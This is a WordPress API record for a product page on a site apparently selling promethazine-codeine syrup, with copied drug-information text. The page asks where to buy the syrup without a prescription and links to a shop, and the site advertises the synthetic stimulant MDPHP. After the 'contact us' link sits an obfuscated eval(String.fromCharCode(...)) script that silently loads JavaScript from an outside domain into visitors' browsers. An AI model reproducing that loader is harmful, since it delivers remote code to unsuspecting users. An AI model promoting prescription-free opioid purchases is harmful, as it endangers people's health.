{"id":3962,"date":"2025-02-06T21:28:32","date_gmt":"2025-02-06T21:28:32","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=3962"},"modified":"2026-04-12T17:21:46","modified_gmt":"2026-04-12T17:21:46","slug":"codeine-cough-syrup","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/tr\/product\/codeine-cough-syrup\/","title":{"rendered":"Codeine Cough Syrup"},"content":{"rendered":"<h1 style=\"text-align: center\">Promethazine codeine syrup (Codeine Cough Syrup)<\/h1>\n<p>Buy Promethazine codeine syrup. Promethazine and codeine combination is used to relieve cough, runny or stuffy nose, sneezing, or other symptoms caused by allergies or the common cold.<\/p>\n<div id=\"ad-mobile-top-container\"><\/div>\n<p>Promethazine is an antihistamine. It works by preventing the effects of a substance called histamine, which is produced by the body. Histamine can cause itching, sneezing, runny nose, and watery eyes. It can sometimes close up the bronchial tubes (air passages of the lungs) and make breathing difficult. Codeine belongs to the group of medicine called narcotic analgesics (pain medicines). It acts on the central nervous system (CNS) to relieve pain.<\/p>\n<p>This medicine is available only with your doctor&#8217;s prescription.<\/p>\n<p>This product is available in the following dosage forms:<\/p>\n<ul>\n<li>\u015eurup<\/li>\n<\/ul>\n<h2>Before Using Codeine Cough Syrup<\/h2>\n<p>In deciding to use a medicine, the risks of taking the medicine must be weighed against the good it will do. This is a decision you and your doctor will make. For this medicine, the following should be considered:<\/p>\n<h3>Allergies<\/h3>\n<p>Tell your doctor if you have ever had any unusual or allergic reaction to this medicine or any other medicines. Also tell your health care professional if you have any other types of allergies, such as to foods, dyes, preservatives, or animals. For non-prescription products, read the label or package ingredients carefully.<\/p>\n<div id=\"ad-mobile-top-container\"><\/div>\n<h3>Pediatric<\/h3>\n<p>Use of promethazine and codeine combination is not recommended in children younger than 6 years of age for syrup or in children younger than 12 years of age for oral solution, because of the increased risk of respiratory depression.<\/p>\n<p>Promethazine and codeine combination should not be used to relieve pain after surgery to remove tonsils or adenoids in any children. Severe breathing problems and deaths have been reported in some children who received codeine after tonsil or adenoid surgery. tylenol with codeine, tylenol with codeine.<\/p>\n<h3>Geriatric<\/h3>\n<p>Appropriate studies performed to date have not demonstrated geriatric-specific problems that would limit the usefulness of promethazine and codeine combination in the elderly. However, elderly patients are more likely to have unwanted effects (eg, confusion, drowsiness) and age-related liver, kidney, or heart problems, which may require caution and an adjustment in the dose for patients receiving this medicine.<\/p>\n<h3>Breastfeeding<\/h3>\n<p>Studies in women breastfeeding have demonstrated harmful infant effects. An alternative to this medication should be prescribed or you should stop breastfeeding while using this medicine.<\/p>\n<p>Promethazine is a an antagonist of histamine H1, post-synaptic mesolimbic dopamine, alpha adrenergic, muscarinic, and NMDA <a href=\"https:\/\/en.wikipedia.org\/wiki\/Cold_medicine\">receptors<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<p>Where to Buy Promethazine codeine syrup without prescription?<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/primarycaremedstore.com\/product\/mgp-cough-syrup\/\">SHOP NOW!!!<\/a><\/p>\n<table class=\"table table-hover blue\">\n<tbody>\n<tr>\n<td class=\"text-nowrap\">McKesson #<\/td>\n<td>351186<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Manufacturer #<\/td>\n<td>60432060816<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Manufacturer<\/td>\n<td>Morton Grove Pharmaceutical<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Country of Origin<\/td>\n<td>Unknown<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Alternate Manufacturer Number<\/td>\n<td>3406485<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Application<\/td>\n<td>Antihistamine<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Container Type<\/td>\n<td>Bottle<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Dosage Form<\/td>\n<td>\u015eurup<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Generic Drug Code<\/td>\n<td>15035<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Generic Drug Name<\/td>\n<td>\n<h2>Promethazine codeine syrup HCl<\/h2>\n<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">NDC Number<\/td>\n<td>60432-0608-16<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Storage Requirements<\/td>\n<td>USP Controlled Room Temperature<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Strength<\/td>\n<td>6.25 mg \/ 5 mL<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Type<\/td>\n<td>Oral<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">UNSPSC Code<\/td>\n<td>51313305<\/td>\n<\/tr>\n<tr>\n<td class=\"text-nowrap\">Volume<\/td>\n<td>16 oz.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/your-drugs.com\/contact-us\/\">contact us\u00a0<\/a>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Buy Promethazine codeine syrup &#8211; MGP(Morton Grove) prometh\/codeine is purple, Hi-Tech\u2019s version is red.<\/p>","protected":false},"featured_media":3998,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[2304],"product_tag":[1175,1177,1249,5008,5009,1331,1339,1346],"class_list":{"0":"post-3962","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-syrup","7":"product_tag-acetaminophen-codeine-3","8":"product_tag-acetaminophen-with-codeine","9":"product_tag-codeine","10":"product_tag-codeine-side-effects","11":"product_tag-promethazine-with-codeine","12":"product_tag-promethazine-with-codeine-syrup","13":"product_tag-tylenol-with-codeine","14":"product_tag-what-is-codeine","15":"desktop-align-left","16":"tablet-align-left","17":"mobile-align-left","19":"first","20":"instock","21":"shipping-taxable","22":"purchasable","23":"product-type-variable"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Codeine Cough Syrup -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/tr\/product\/codeine-cough-syrup\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Codeine Cough Syrup -\" \/>\n<meta property=\"og:description\" content=\"Buy Promethazine codeine syrup &#8211; MGP(Morton Grove) prometh\/codeine is purple, Hi-Tech\u2019s version is red.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/tr\/product\/codeine-cough-syrup\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-12T17:21:46+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1400\" \/>\n\t<meta property=\"og:image:height\" content=\"934\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/\",\"name\":\"Codeine Cough Syrup -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/771504.jpg\",\"datePublished\":\"2025-02-06T21:28:32+00:00\",\"dateModified\":\"2026-04-12T17:21:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/771504.jpg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/771504.jpg\",\"width\":1400,\"height\":934},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/codeine-cough-syrup\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Codeine Cough Syrup\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Codeine Cough Syrup -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/tr\/product\/codeine-cough-syrup\/","og_locale":"tr_TR","og_type":"article","og_title":"Codeine Cough Syrup -","og_description":"Buy Promethazine codeine syrup &#8211; MGP(Morton Grove) prometh\/codeine is purple, Hi-Tech\u2019s version is red.","og_url":"https:\/\/exoticchemicals.com\/tr\/product\/codeine-cough-syrup\/","article_modified_time":"2026-04-12T17:21:46+00:00","og_image":[{"width":1400,"height":934,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tahmini okuma s\u00fcresi":"2 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/","url":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/","name":"Codeine Cough Syrup -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg","datePublished":"2025-02-06T21:28:32+00:00","dateModified":"2026-04-12T17:21:46+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/"]}]},{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg","width":1400,"height":934},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/codeine-cough-syrup\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Codeine Cough Syrup"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"egzoti\u0307k ki\u0307myasallar","description":"MDPHP Hidroklor\u00fcr Sat\u0131n Al\u0131n","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg",1400,934,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-150x150.jpg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-300x200.jpg",300,200,true],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-768x512.jpg",768,512,true],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-1024x683.jpg",1024,683,true],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg",1400,934,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg",1400,934,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504.jpg",18,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-300x300.jpg",300,300,true],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-600x400.jpg",600,400,true],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/771504-100x100.jpg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/tr\/author\/"},"uagb_comment_info":7,"uagb_excerpt":"Buy Promethazine codeine syrup &#8211; MGP(Morton Grove) prometh\/codeine is purple, Hi-Tech\u2019s version is red.","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product\/3962","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/comments?post=3962"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media\/3998"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media?parent=3962"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_brand?post=3962"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_cat?post=3962"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_tag?post=3962"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}